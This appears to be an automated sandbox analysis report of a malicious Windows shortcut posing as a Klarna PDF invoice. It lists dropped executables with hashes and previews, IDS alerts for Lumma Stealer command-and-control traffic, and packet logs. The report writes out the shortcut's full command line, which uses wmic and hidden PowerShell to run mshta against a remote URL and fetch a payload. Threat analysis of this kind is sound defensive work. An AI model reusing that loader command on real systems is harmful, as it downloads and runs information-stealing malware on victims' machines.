                                                                                                              Preview:.........UaZQ........y.ly.F...^..pmMW.Q.rib...[...f.M......t.._...u....SP.d..j..S\oW.Mu..pGTp.pv.j.....ZwBiuv..EqTo...IlKX..Zs..d.Q..ARmk......_.L.._MAp.....W.A...IF.c.Da[.^v...CS..y...[...J.k....UA...\.....e.y..Y.[e.W..D..Ub.Hy.y........nv.eSf...y..].l.k..i.Th]..VCa..EY..R.ZbC.h.k.YI`.UveZ...\..nF.b....t[....UES...GiP.SNw..G.[u.iG.\`.H^....OHw...Z.xKr.JJ.....m.......rpb.ktCw.c.Q..w.....JvMFl.L..pb.b.....].l.Iy.pHL..N.gY..e....x....Ues....]...Ts.^C....q.Q.N....O....Ub....g.Y.r..y.P[q.....\.T..L.Fch^..s.FofO......LZNhKL.g.N..N..Al.i.j...PpZFF.p.R^...sJ...SW..Gn^gv`c.sVJWfyRKJgb.I.J..`.I.._Lll.ZU....jO`...]_.p\[.x...Atb.Y.W..\o.YV.a[btU..Wd.T[OX.q.V.j.RJ.EN.`uf....OpK.sGo.I.`jh.RJb.u..YZGi].x..Z\.q.Q....RW....a.Q..dK.K..H......G.r..wS....Lx.\......U..y....n.aM.b.tMX.lfHO^q.s.F.BF.R...Z.....l.nG..q...xJ.HS.d..vo.u.SK.otiMa.DcvG..s.E.m.AlVYsdoAV...h.....ux.Fe..a^K..Jtkk...........H.d.t...ca...p.....P..`LgxEVo...^..f...IlTvJ[...^`.S.uXeTt...s....G.xc.Iq.IMkc.o..Ji..AUM..TqsNpXU..pT]c.].LeQj
                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                              File Type:JSON data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):55
                                                                                                              Entropy (8bit):4.306461250274409
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                              MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                              SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                              SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                              SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                              Malicious:false
                                                                                                              Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                              Process:C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exe
                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (505), with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):2450
                                                                                                              Entropy (8bit):3.7468490440653532
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:48:y+03qHhhOeIInpne1+eMc+wJa0wfyc5TYafj3i+prqLL7iOWpral:XJpn6+eMc+v0wfycljlprqLP7WprM
                                                                                                              MD5:108BC8FD6465B132B6E695B8A7E692A4
                                                                                                              SHA1:5C7A841DFB5CDCF274A9CE22F173E4584CFD07C1
                                                                                                              SHA-256:4B10EF2B1AAEA1003FB7A77744920EDAB9F6D9E59718A3586A4A82DEBBFD823D
                                                                                                              SHA-512:5F5225F7AEB8987472D6E04869B1659BC38AA85ABEAED8FEDEB39EB354BF8D9EF63BD27B0E99CD95312A5A172692ADBCB31F76E78ECE75F79EBB4D95FE46D95D
                                                                                                              Malicious:false
                                                                                                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.B.o.o.t.s.t.r.a.p.p.e.r.A.p.p.l.i.c.a.t.i.o.n.D.a.t.a. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.x./.2.0.1.0./.B.o.o.t.s.t.r.a.p.p.e.r.A.p.p.l.i.c.a.t.i.o.n.D.a.t.a.".>..... . .<.W.i.x.B.u.n.d.l.e.P.r.o.p.e.r.t.i.e.s. .D.i.s.p.l.a.y.N.a.m.e.=.".C.h.o.w.c.h.o.w.". .L.o.g.P.a.t.h.V.a.r.i.a.b.l.e.=.".W.i.x.B.u.n.d.l.e.L.o.g.". .C.o.m.p.r.e.s.s.e.d.=.".n.o.". .I.d.=.".{.1.f.8.e.5.8.e.1.-.a.9.4.b.-.4.1.a.a.-.9.5.7.8.-.1.f.e.c.3.5.9.7.e.3.6.5.}.". .U.p.g.r.a.d.e.C.o.d.e.=.".{.7.9.7.2.7.7.6.7.-.1.C.C.C.-.4.4.C.4.-.8.3.0.6.-.4.9.8.A.D.9.3.5.2.6.A.3.}.". .P.e.r.M.a.c.h.i.n.e.=.".y.e.s.". ./.>..... . .<.W.i.x.P.a.c.k.a.g.e.P.r.o.p.e.r.t.i.e.s. .P.a.c.k.a.g.e.=.".S.t.r.a.n.d.". .V.i.t.a.l.=.".y.e.s.". .D.i.s.p.l.a.y.N.a.m.e.=.".M.i.c.r.o.s.o.f.t. .V.i.s.u.a.l. .C.+.+. .2.0.2.2. .X.6.4. .A.d.d.i.t.i.o.n.a.l. .R.u.n.t.i.m.e. .-. .1.4...4.0...3.3.8.1.0.". .D.o.w.n.l.o.a.d.S.i.z.e.
                                                                                                              Process:C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exe
                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):475136
                                                                                                              Entropy (8bit):5.874504072012632
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:12288:N7QqvXGL+z42tZ9dDrEbAd7d4BlaoiHWFQt9wM:N7fj42tZ/4bAd7d4BgoiHWFQt9wM
                                                                                                              MD5:7392D065D0F9B1D9C71FCD98B1FA4BE2
                                                                                                              SHA1:234186438615B22B6B7590D4544350F307CF401D
                                                                                                              SHA-256:99C3ED31D9314C584F943A9A9FCD040795004DA5637E67F54F6F7A45EFC556D6
                                                                                                              SHA-512:597ECA388A1FD774FFE19F7A9C1587128A0282D814F733B2BA2B0048B698DCA08EF095068451DC14DCAEDEA287049759EB3ED2ECB5AA2FA95EF5DE55A0CF1879
                                                                                                              Malicious:true
                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........{o,]...]...]...2...U.......}...2.../....91.)...]...'...?...T....90.Q.......\....:..\...Rich]...................PE..L......=...........!................................................................................................`m.......c..d....`..x....................p...&...................................................................................text.............................. ..`.rdata..............................@..@.data........p.......p..............@....rsrc...x....`......................@..@.reloc..P3...p...@..................@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                              Process:C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exe
                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):653952
                                                                                                              Entropy (8bit):6.885961951552677
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:12288:5hr4UC+Ju/A0BI4yWkoGKJwZ9axKmhYTMAO7wFKjCUmRyyPe:9JfyZFGKJjxKmhSMAB6CUmRyyPe
                                                                                                              MD5:11D49148A302DE4104DED6A92B78B0ED
                                                                                                              SHA1:FD58A091B39ED52611ADE20A782EF58AC33012AF
                                                                                                              SHA-256:CEB0947D898BC2A55A50F092F5ED3F7BE64AC1CD4661022EEFD3EDD4029213B0
                                                                                                              SHA-512:FDC43B3EE38F7BEB2375C953A29DB8BCF66B73B78CCC04B147E26108F3B650C0A431B276853BB8E08167D34A8CC9C6B7918DAEF9EBC0A4833B1534C5AFAC75E4
                                                                                                              Malicious:false
                                                                                                              Antivirus:
                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................6.........!.R...7.....&.....0.....6.....3...Rich..........PE..L.....i[...........!.....\..........@-.......p....Rx.........................0......?T....@..............................|..P...(................................3......................................@............................................text...t[.......\.................. ..`.data....g...p...D...`..............@....rsrc...............................@..@.reloc...7.......8..................@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                              Process:C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):785809
                                                                                                              Entropy (8bit):7.8961399536577455
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:12288:U7+7mOB4HOu13QO9CviA3N4AS2HCczmxq9q4SZGmxB9i8k/yHUhyCLl:U7amOBfu1b9CviA82icis9yZhkbsal
                                                                                                              MD5:43341E3555F6556A2903517C245FDDB1
                                                                                                              SHA1:20F493333103CE83D21A72D8AED9FF7EC835626F
                                                                                                              SHA-256:00711B19D0EC268E1816F3661AA9ABCD38E4D0F990CB464136BB3E1FCEBCBECF
                                                                                                              SHA-512:3DA8E93C4AD6112535A8AA8C440E3D03F3AC2EEF248FB171EE3830093AA9293749CF79474DA9965EF7F25415B7BE9A8AB1BAD3BD3099E06B9581DCE465C2BEA7
                                                                                                              Malicious:false
                                                                                                              Preview:xM...I.wF.R..q.....LW...Fd....^.....y......q....eRF.jB..hA.E.bR..a.lvl....vN..GY.^.FEQ.S..r....WX.\.XO...uvt.xF.B.fIy[UjH.f.^T.l.tn..l..An.p..T.G..F.dND[Vq.dvk.LHM_Aq.iK..hG[FBoq.aIW.v.e.U.E..hUO..h^.I\.Lp..IO.IMGZ..F.UD.F...j...m.lC.f.u.m...J..NJY.UdT..f.o.H....M.T.tB.v..cA..BW..vB.Wd..ph....n.....qi.A.kH..cMtU...gwyYD.B].]....A.Y...W..I`vx.Jt.XO...f..D.p..nU..P..xC..V.KJe.[.Lo._....`i.g..AMciN..C...NoatDm..^deI...._..KIxVyD..l...Z.B..Mj.......e.I.S.pAGU.K.`W.....\.hW..ov..x..Y.h...N._v.n...bu..X..D..P.F.Z...OX.EL.I[uZ..ceN.t.r.wca..f_...lh^..x.r.l.wT.lHU.Wcx.X.......NE...V...NuH..w..tY..m^I..nV.].....PX..C.vDJ.my.xshE..^.TNi.K..NM\yhs.M...i^.gIhG.n.FnjP...^.m..LC.WeQF.\piArPw.....xg.^.^.jD..l.Q..y.HG....v...\e..w.b.J_ELH.u..b..OM`..j....I.....Yy..V..]m.ks.i[.yuAA.tu....AQ.I.JH\.......]t.F.]..Ti.M.FP.`LF.e..`_.U.RRTkT...VuV.gOA.P.iBs.fXW....vlp_....^...XI.`lX.y...U.R..q.s.QDi`w...Q.\Kdu.A....T...i..wxEA...M.ZGF.e....GNC..L.yJAN.....XV....`F^.Tr.RvS.So.V.Irj.o.....u\t.A..`..y...Hr.c...
                                                                                                              Process:C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exe
                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):29152
                                                                                                              Entropy (8bit):6.656857622778623
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:768:+yq82Ud7/zfkn8I+ilpd4TILqIgXYoBCH/3hprl:Zq824LfMV4TqqIgXYoBCH/3hpB
                                                                                                              MD5:B6F6C3C38568EE26F1AC70411A822405
                                                                                                              SHA1:5B94D0ADAC4DF2D7179C378750C4E3417231125F
                                                                                                              SHA-256:A73454C7FAD23A80A3F6540AFDB64FC334980A11402569F1986AA39995AE496D
                                                                                                              SHA-512:5C0A5E9A623A942AFF9D58D6E7A23B7D2BBA6A4155824AA8BB94DBD069A8C15C00DF48F12224622EFCD5042B6847C8FB476C43390E9E576C42EFC22E3C02A122
                                                                                                              Malicious:true
                                                                                                              Antivirus:
                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......y...=...=...=....`.?...#.e.?...#.c.<...#.r.?.......8...=...f...#.u.$...#.b.<...#.g.<...Rich=...................PE..L......I................."...(......a,.......@....@..................................u......................................lB..P....p..@............N...#...........................................A..@............@..x............................text....!.......".................. ..`.rdata.......@.......&..............@..@.data........P.......0..............@....rsrc...@....p.......<..............@..@................................................................................................................................................................................................................................................................................................................................................................
                                                                                                              Process:C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exe
                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):2649600
                                                                                                              Entropy (8bit):6.720396083797047
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:49152:sd0krhjbVYU9U/ElyrLKlvGBO58GBjI9nYM6JBe4PjnhMsQHNClhIdYTf2O+yX3l:lkrRyylvGB652NCMghMtHIledkpX4
                                                                                                              MD5:142993A82414D3FA9C7904947E67A905
                                                                                                              SHA1:B4FAAD4FB70B7B162CC5AA0D0424C97161D7568C
                                                                                                              SHA-256:DB33DD28D3365144495CB84F586E029BBC90A5FC94208A1B206A55B05C1C06DF
                                                                                                              SHA-512:6A1AA960352420C4C583F74F61D93A5A3F3826F3E2BA32B7CDB72EBFF1D28662E30BF41A56FC8CE3559F33AA56C384975D91E0C9C0FE434AC71ADCAAA6F10AF2
                                                                                                              Malicious:true
                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Bu....{...{...{..[...{..l...{..l....{..l....{..l...{...z.<.{..l..{..l...{..l...{..l...{.Rich..{.................PE..L...x..^...........!.........................................................).....\g)...@..........................g!..|...Q!.x....@(. ....................P(..Z.. ................................O!.@............................................text...z........................... ..`.rdata...D.......F..................@..@.data...pC....!..(....!.............@....rsrc... ....@(.......&.............@..@.reloc..~f...P(..h....'.............@..B................................................................................................................................................................................................................................................................................................................
                                                                                                              Process:C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):48414
                                                                                                              Entropy (8bit):4.708963357337208
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:768:TBecXfqXf1NYNIInfYgQHny+jIjZqd0VXSFonM1DUZazSyE3e4NTTB:FhXumbjMQSFonM2U38est
                                                                                                              MD5:BD34E124C62C5916C58859BF725D1DFF
                                                                                                              SHA1:4C3A7552AD57433A0F4D38A4527F5B92D6C361A7
                                                                                                              SHA-256:9025D6D49F7E049236639E657A30692E47BBECD826857B90A26DCA637C081CBB
                                                                                                              SHA-512:C0EA564EEFBF96ECD80E1DA5DB649CE2E23199FDDC9CD5BC35A49487F8F65CB1A33FDF9D0FE79BEB417A1F311AB2B3FC134D5E610C26789B9855DF4FE2DC4490
                                                                                                              Malicious:false
                                                                                                              Preview:.........UaZQ........y.ly.F...^..pmMW.Q.rib...[...f.M......t.._...u....SP.d..j..S\oW.Mu..pGTp.pv.j.....ZwBiuv..EqTo...IlKX..Zs..d.Q..ARmk......_.L.._MAp.....W.A...IF.c.Da[.^v...CS..y...[...J.k....UA...\.....e.y..Y.[e.W..D..Ub.Hy.y........nv.eSf...y..].l.k..i.Th]..VCa..EY..R.ZbC.h.k.YI`.UveZ...\..nF.b....t[....UES...GiP.SNw..G.[u.iG.\`.H^....OHw...Z.xKr.JJ.....m.......rpb.ktCw.c.Q..w.....JvMFl.L..pb.b.....].l.Iy.pHL..N.gY..e....x....Ues....]...Ts.^C....q.Q.N....O....Ub....g.Y.r..y.P[q.....\.T..L.Fch^..s.FofO......LZNhKL.g.N..N..Al.i.j...PpZFF.p.R^...sJ...SW..Gn^gv`c.sVJWfyRKJgb.I.J..`.I.._Lll.ZU....jO`...]_.p\[.x...Atb.Y.W..\o.YV.a[btU..Wd.T[OX.q.V.j.RJ.EN.`uf....OpK.sGo.I.`jh.RJb.u..YZGi].x..Z\.q.Q....RW....a.Q..dK.K..H......G.r..wS....Lx.\......U..y....n.aM.b.tMX.lfHO^q.s.F.BF.R...Z.....l.nG..q...xJ.HS.d..vo.u.SK.otiMa.DcvG..s.E.m.AlVYsdoAV...h.....ux.Fe..a^K..Jtkk...........H.d.t...ca...p.....P..`LgxEVo...^..f...IlTvJ[...^`.S.uXeTt...s....G.xc.Iq.IMkc.o..Ji..AUM..TqsNpXU..pT]c.].LeQj
                                                                                                              Process:C:\Users\user\AppData\Roaming\IMAKBWPY.exe
                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):2984244
                                                                                                              Entropy (8bit):7.938952127267539
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:49152:sfU4UjEXzJK3Ecgbh2h39tV9oChSkJ0h37Hfan8oO9obENintSHdhQxns:sfUbYXzJqoh21Rmx/uLTDngKxs
                                                                                                              MD5:E9D35A53128839CFBB1A329A23BB430B
                                                                                                              SHA1:EDAAC255194E5ACD45CDFD411DDC4A0D4B8AADB8
                                                                                                              SHA-256:02924A18244686A485A533E0EAC2A78F777865F8F2CB585B2E2449C43F8A4FEB
                                                                                                              SHA-512:CC5A259F3D6EC8F6A259FA731895DD6B8DC01D77BCADC663E33C9A7623F3FC3E3A11F44CB7CF8B69079082A5041E436387CF3B2F5F5A8DD65729118A442F4BB5
                                                                                                              Malicious:true
                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A!.S.@...@...@......@.....y@......@..."|..@..."{..@..."z.#@...8...@...8...@...@~.PA...#z.N@...#...@...@...@...#}..@..Rich.@..................PE..L......Z.....................t....................@..........................P............@..............................................:.......................=..Pv..T....................v......0p..@...................4........................text...7........................... ..`.rdata..`...........................@..@.data...0...........................@....wixburn8...........................@..@.rsrc....:.......<..................@..@.reloc...=.......>..................@..B................................................................................................................................................................................................................................................
                                                                                                              Process:C:\Windows\System32\wbem\WMIC.exe
                                                                                                              File Type:ASCII text, with CRLF, CR line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):160
                                                                                                              Entropy (8bit):5.083203110114614
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:YwM2FgCKGWMRX1eRHXWXKSovrj4WA3iygK5k3koZ3Pveys1MgnQnvlJQAiveyzoa:Yw7gJGWMXJXKSOdYiygKkXe/egQndeAc
                                                                                                              MD5:42056E72D7560A82C69A8C0577BE3CD8
                                                                                                              SHA1:BD6822E26F15A535740D3D63FA5CEC8189171967
                                                                                                              SHA-256:BA967FC8FF530744C5DEE98FD51B35EF08C857B185DA08A837D58B26893EAEBA
                                                                                                              SHA-512:59E136BA6CDFDD9D2467A20BBA3530288DA15FC483306905083EEFDDF41BBF4650DE0891A19C43D5BB90039EE4BCFDD44CDBA5B08DC353C111291820E877BEBE
                                                                                                              Malicious:false
                                                                                                              Preview:Executing (Win32_Process)->Create()...Method execution successful....Out Parameters:..instance of __PARAMETERS..{...ProcessId = 5544;...ReturnValue = 0;..};....
                                                                                                              File type:MS Windows shortcut, Item id list present, Has Relative path, Has command line arguments, Icon number=11, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hidenormalshowminimized
                                                                                                              Entropy (8bit):2.5112030323875967
                                                                                                              TrID:
                                                                                                              • Windows Shortcut (20020/1) 100.00%
                                                                                                              File name:KlarnaInvoice229837.pdf.lnk
                                                                                                              File size:1'938 bytes
                                                                                                              MD5:da28a682053a47872919a14d25e98598
                                                                                                              SHA1:ab0f8eb3dd79555ed426f70fee752fe037e74fa5
                                                                                                              SHA256:f830850a900edc87a76adfafb59fe18b33426bad84478cb1c6a6392f582b4c78
                                                                                                              SHA512:af2fe33e44bb9826ef043b121efd86c22502a1880c4e18a6e1d45a7fbdf4b0749a5d7a0ccd75bb1f19ed4a0e27af80426a36c3394270a7168bb6d5cbe14068a0
                                                                                                              SSDEEP:24:8AyH/BUlgKN4e0+/3ckWNBvLlhAj3Vqdd79dsHLIQ:89uGeTclBzlmj3QdJ9
                                                                                                              TLSH:15413A186AE51B20F3B68E32587AB7218A7B7C97ED628F1D018146CD2425610EC75F6B
                                                                                                              File Content Preview:L..................F.@...........................................................P.O. .:i.....+00.../C:\...................V.1...........Windows.@.............................................W.i.n.d.o.w.s.....Z.1...........System32..B.....................
                                                                                                              Icon Hash:929e9e96a3f3d6ed

                                                                                                              General

                                                                                                              Relative Path:..\..\..\..\..\..\Windows\System32\Wbem\wmic.exe
                                                                                                              Command Line Argument:process call create "powershell -w 1 . \W*\S*2\m*ht*e https://naubeautylus.ch/Headerfrontend"
                                                                                                              Icon location:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                              2024-12-16T09:14:19.746722+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.44973662.182.21.105443TCP
                                                                                                              2024-12-16T09:15:26.646413+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449815104.21.59.81443TCP
                                                                                                              2024-12-16T09:15:27.711404+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449815104.21.59.81443TCP
                                                                                                              2024-12-16T09:15:27.711404+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449815104.21.59.81443TCP
                                                                                                              2024-12-16T09:15:29.050365+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449820104.21.59.81443TCP
                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                              Dec 16, 2024 09:14:10.413666964 CET49730443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:10.413770914 CET4434973062.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:10.413933039 CET49730443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:10.427470922 CET49730443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:10.427510023 CET4434973062.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:11.857304096 CET4434973062.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:11.857387066 CET49730443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:11.907759905 CET49730443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:11.907818079 CET4434973062.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:11.908767939 CET4434973062.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:11.908826113 CET49730443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:11.911381960 CET49730443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:11.955353022 CET4434973062.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:12.369091988 CET4434973062.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:12.369195938 CET49730443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:12.561522961 CET4434973062.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:12.561537981 CET4434973062.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:12.561616898 CET4434973062.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:12.561748028 CET49730443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:12.561748028 CET49730443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:12.561814070 CET4434973062.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:12.561881065 CET49730443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:12.614109039 CET4434973062.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:12.614156961 CET4434973062.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:12.614234924 CET49730443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:12.614303112 CET4434973062.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:12.614341974 CET49730443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:12.615349054 CET49730443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:12.753272057 CET4434973062.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:12.753293991 CET4434973062.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:12.753357887 CET49730443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:12.753384113 CET4434973062.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:12.753439903 CET49730443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:12.798873901 CET4434973062.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:12.798918009 CET4434973062.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:12.798949003 CET49730443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:12.798965931 CET4434973062.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:12.798995018 CET49730443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:12.799014091 CET49730443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:12.825248957 CET4434973062.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:12.825294971 CET4434973062.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:12.825329065 CET49730443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:12.825370073 CET4434973062.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:12.825401068 CET49730443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:12.825447083 CET49730443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:12.855895996 CET4434973062.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:12.855916023 CET4434973062.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:12.855962038 CET49730443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:12.855983973 CET4434973062.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:12.856008053 CET49730443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:12.856264114 CET49730443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:12.945642948 CET4434973062.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:12.945684910 CET4434973062.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:12.945724010 CET49730443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:12.945739031 CET4434973062.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:12.945770025 CET49730443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:12.945806026 CET49730443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:12.971503019 CET4434973062.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:12.971524000 CET4434973062.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:12.971570015 CET49730443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:12.971590996 CET4434973062.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:12.971613884 CET49730443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:12.971632957 CET49730443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:12.994956970 CET4434973062.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:12.995009899 CET4434973062.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:12.995043039 CET49730443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:12.995060921 CET4434973062.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:12.995088100 CET49730443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:12.995105982 CET49730443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:13.011240959 CET4434973062.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:13.011287928 CET4434973062.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:13.011360884 CET49730443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:13.011360884 CET49730443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:13.011387110 CET4434973062.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:13.011436939 CET49730443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:13.021795988 CET4434973062.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:13.021842003 CET4434973062.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:13.021893978 CET49730443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:13.021908045 CET4434973062.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:13.021939993 CET49730443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:13.023859978 CET49730443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:13.035058975 CET4434973062.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:13.035108089 CET4434973062.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:13.035270929 CET49730443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:13.035290956 CET4434973062.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:13.035340071 CET49730443192.168.2.462.182.21.105
